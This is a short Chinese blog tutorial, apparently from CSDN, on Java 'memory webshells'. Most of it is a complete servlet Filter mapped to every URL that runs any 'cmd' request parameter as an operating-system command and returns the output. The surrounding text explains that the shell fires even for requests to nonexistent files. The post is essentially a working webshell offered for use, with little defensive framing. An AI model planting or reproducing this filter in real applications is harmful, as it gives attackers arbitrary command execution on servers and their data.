Java内存马基础

Java过滤器内存马

首先过滤器,顾名思义就是过滤用的;
在这里插入图片描述
首先设置要过滤的目录或文件,当我们访问该目录中的文件时都会经过过滤器;如果我们将webshell代码放到过滤器中,那么只要我们的访问经过过滤器都可以出发木马。
下面是一个最基本的filter内存马:

package filter;

import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
//设置过滤所有请求
@WebFilter(urlPatterns = "/*")
public class firstFilter implements Filter {
    public void destroy() {
    }

    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws ServletException, IOException {
        System.out.println("这是过滤器!!!");
        //cmd:触发参数
        if (req.getParameter("cmd")!=null){
        //一句话木马
            Process process = Runtime.getRuntime().exec(req.getParameter("cmd"));
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = bufferedReader.readLine())!=null){
                resp.getWriter().println(line);
            }
            resp.getWriter().flush();
        }
        chain.doFilter(req,resp);
    }

    public void init(FilterConfig config) throws ServletException {

    }

}

在这里插入图片描述
总结:
当过滤器的目录为/*时我们即使访问不存在文件也会成功执行。
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值